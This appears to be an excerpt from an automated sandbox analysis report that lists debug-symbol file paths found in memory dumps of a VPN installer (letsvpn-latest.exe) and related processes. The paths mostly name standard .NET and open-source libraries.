              Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdb source: letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdb source: letsvpn-latest.exe, 00000013.00000003.2475399592.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdb source: letsvpn-latest.exe, 00000013.00000003.2469739574.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2478147002.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Drawing.Primitives\4.0.2.0\System.Drawing.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2415799457.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb4 source: letsvpn-latest.exe, 00000013.00000003.2382726468.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Data.Common/netfx\System.Data.Common.pdb source: letsvpn-latest.exe, 00000013.00000003.2404532270.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.DriveInfo\4.0.2.0\System.IO.FileSystem.DriveInfo.pdb source: letsvpn-latest.exe, 00000013.00000003.2421249747.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdb source: letsvpn-latest.exe, 00000013.00000003.2415149418.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdbSHA256zqXL source: letsvpn-latest.exe, 00000013.00000003.2475399592.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2441430774.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdb source: letsvpn-latest.exe, 00000013.00000003.2453541303.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000013.00000003.2540392620.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2522666956.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2541195022.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb} source: letsvpn-latest.exe, 00000013.00000003.2505805799.0000000002832000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2776314664.0000000005442000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2420610535.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdb source: letsvpn-latest.exe, 00000013.00000003.2480597366.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdbSHA256) source: letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdbSHA2562` source: letsvpn-latest.exe, 00000013.00000003.2379177568.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\winsign\samuli\source\repos\tap-windows6\src\x64\Release\tap0901.pdb source: letsvpn-latest.exe, 00000013.00000003.2321708359.0000000002835000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000021.00000003.2696574571.00000240C454C000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000021.00000003.2702190393.00000240C460C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2385529733.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Console\4.0.2.0\System.Console.pdb source: letsvpn-latest.exe, 00000013.00000003.2402237469.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdb source: letsvpn-latest.exe, 00000013.00000003.2399608066.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: letsvpn-latest.exe, 00000013.00000003.2439763366.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.EventBasedAsync\4.0.11.0\System.ComponentModel.EventBasedAsync.pdb source: letsvpn-latest.exe, 00000013.00000003.2394069792.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb$*>* 0*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb/5I5 ;5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2426101916.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TraceSource\4.0.2.0\System.Diagnostics.TraceSource.pdb source: letsvpn-latest.exe, 00000013.00000003.2413671247.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.UnmanagedMemoryStream\4.0.3.0\System.IO.UnmanagedMemoryStream.pdb source: letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdbt( source: letsvpn-latest.exe, 00000013.00000003.2495322784.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdb source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: InternalNameMono.Cecil.Pdb.dllf! source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNInfraStructure\obj\Release\LetsVPNInfraStructure.pdb source: letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: letsvpn-latest.exe, 00000013.00000003.2454328658.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256xpRb source: letsvpn-latest.exe, 00000013.00000003.2380557489.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2405800752.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.IdentityModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdb source: letsvpn-latest.exe, 00000013.00000003.2445404154.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2478798275.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb}> source: letsvpn-latest.exe, 00000013.00000003.2541195022.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb source: letsvpn-latest.exe, 00000013.00000003.2458044881.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb source: letsvpn-latest.exe, 00000013.00000003.2420064156.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdbSHA256_- source: letsvpn-latest.exe, 00000013.00000003.2364198304.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2376617919.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdb source: letsvpn-latest.exe, 00000013.00000003.2503453732.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2485105994.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb,)F) 8)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.TypeConverter\4.1.2.0\System.ComponentModel.TypeConverter.pdb source: letsvpn-latest.exe, 00000013.00000003.2395625612.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2467350670.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Extensions\4.0.1.0\System.Reflection.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2450317572.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb source: letsvpn-latest.exe, 00000013.00000003.2388106062.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb source: letsvpn-latest.exe, 00000013.00000003.2505805799.0000000002832000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, LetsPRO.exe, 00000036.00000002.2776314664.0000000005442000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Concurrent\4.0.11.0\System.Collections.Concurrent.pdb source: letsvpn-latest.exe, 00000013.00000003.2390404477.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NetworkInformation\4.1.2.0\System.Net.NetworkInformation.pdb source: letsvpn-latest.exe, 00000013.00000003.2443068501.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.Pdb source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2449650568.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Globalization.Extensions/netfx\System.Globalization.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2418029121.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ZMono.Cecil.Pdb, PublicKey=00240000048000009400000006020000002400005253413100040000010001002b5c9f7f04346c324a3176f8d3ee823bbf2d60efdbc35f86fd9e65ea3e6cd11bcdcba3a353e55133c8ac5c4caaba581b2c6dfff2cc2d0edc43959ddb86b973300a479a82419ef489c3225f1fe429a708507bd515835160e10bc743d20ca33ab9570cfd68d479fcf0bc797a763bec5d1000f0159ef619e709d915975e87beebaf source: letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x86\e_sqlite3.pdb source: letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb source: letsvpn-latest.exe, 00000013.00000003.2454973040.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2351037678.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb source: letsvpn-latest.exe, 00000013.00000003.2506430141.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: letsvpn-latest.exe, 00000013.00000003.2488650943.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.ReaderWriter\4.1.1.0\System.Xml.ReaderWriter.pdb source: letsvpn-latest.exe, 00000013.00000003.2500003691.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Formatters\4.0.2.0\System.Runtime.Serialization.Formatters.pdb source: letsvpn-latest.exe, 00000013.00000003.2458732263.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2471668940.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks.Parallel\4.0.1.0\System.Threading.Tasks.Parallel.pdb source: letsvpn-latest.exe, 00000013.00000003.2487372239.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2326201013.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3922925338.0000000005F32000.00000002.00000001.01000000.0000001F.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdb source: letsvpn-latest.exe, 00000013.00000003.2352489250.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdbSHA256aP source: letsvpn-latest.exe, 00000013.00000003.2498550743.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets.Client\4.0.2.0\System.Net.WebSockets.Client.pdb source: letsvpn-latest.exe, 00000013.00000003.2447316016.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdb source: letsvpn-latest.exe, 00000013.00000003.2481269690.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2420610535.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb source: letsvpn-latest.exe, 00000013.00000003.2423303491.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdbL source: letsvpn-latest.exe, 00000013.00000003.2383731148.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.Pdb.dll source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\Microsoft.Expression.Interactions\Win32\Release\Microsoft.Expression.Interactions.pdb source: letsvpn-latest.exe, 00000013.00000003.2353949816.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdb source: letsvpn-latest.exe, 00000013.00000003.2405800752.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdbSHA256a? source: letsvpn-latest.exe, 00000013.00000003.2362053914.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2348840467.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, LetsPRO.exe, 00000036.00000002.2776724379.0000000005842000.00000002.00000001.01000000.0000001C.sdmp
              Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\System.Windows.Interactivity\Win32\Release\System.Windows.Interactivity.pdb source: letsvpn-latest.exe, 00000013.00000003.2499310086.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel\4.0.1.0\System.ComponentModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2396668946.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdbSHA256a3 source: letsvpn-latest.exe, 00000013.00000003.2479437408.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\playercode\branches\branch\bin\Release\sinaplayer_service.pdb source: sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb source: letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdbSHA256K source: letsvpn-latest.exe, 00000013.00000003.2482513419.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\webview2_api_writer\dotNetAPIWrapper\Microsoft.Web.WebView2.Core\bin\ReleasePackage\Microsoft.Web.WebView2.Core.pdb source: letsvpn-latest.exe, 00000013.00000003.2357195535.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2467350670.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Numerics.Vectors/net46\System.Numerics.Vectors.pdb source: letsvpn-latest.exe, 00000013.00000003.2448705376.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdbSHA256x source: letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdb source: letsvpn-latest.exe, 00000013.00000003.2426656105.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdb source: letsvpn-latest.exe, 00000013.00000003.2366490772.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdbH,b, T,_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2444291104.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdb source: letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdb source: letsvpn-latest.exe, 00000013.00000003.2427329081.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdb source: letsvpn-latest.exe, 00000013.00000003.2476800836.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2426101916.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: letsvpn-latest.exe, 00000013.00000003.2416528119.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XDocument\4.0.11.0\System.Xml.XDocument.pdb source: letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2366490772.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdbd+~+ p+_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2394827139.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdbSHA256Uu source: letsvpn-latest.exe, 00000013.00000003.2480597366.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading\4.0.11.0\System.Threading.pdb source: letsvpn-latest.exe, 00000013.00000003.2497054604.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb source: letsvpn-latest.exe, 00000013.00000003.2419235971.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmp
              Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2485105994.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdb source: letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebHeaderCollection\4.0.1.0\System.Net.WebHeaderCollection.pdb source: letsvpn-latest.exe, 00000013.00000003.2446699200.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding.Extensions\4.0.11.0\System.Text.Encoding.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2483211006.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdb source: letsvpn-latest.exe, 00000013.00000003.2454328658.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2381721740.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Specialized\4.0.3.0\System.Collections.Specialized.pdb source: letsvpn-latest.exe, 00000013.00000003.2391660353.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\vendor\nuget\src\Core\obj\Release\NuGet.Squirrel.pdb source: letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdb source: letsvpn-latest.exe, 00000013.00000003.2350329188.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdbSHA2569v'` source: letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.PdbG source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.NonGeneric\4.0.3.0\System.Collections.NonGeneric.pdb source: letsvpn-latest.exe, 00000013.00000003.2391033106.0000000002835000.00000004.00000020.00020000.00000000.sdmp
